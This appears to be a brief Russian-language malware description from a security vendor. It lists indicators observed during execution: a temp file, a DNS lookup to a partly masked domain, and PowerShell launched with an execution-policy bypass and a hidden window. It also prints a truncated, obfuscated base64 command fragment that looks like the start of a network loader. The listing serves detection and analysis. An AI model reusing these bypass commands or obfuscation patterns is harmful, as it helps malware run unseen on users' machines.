Техническая информация
- %TEMP%\false.txt
- DNS ASK de####brat.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -File %TEMP%\rfyvt.ps1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $rxMty = 'Ww' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' +... (со скрытым окном)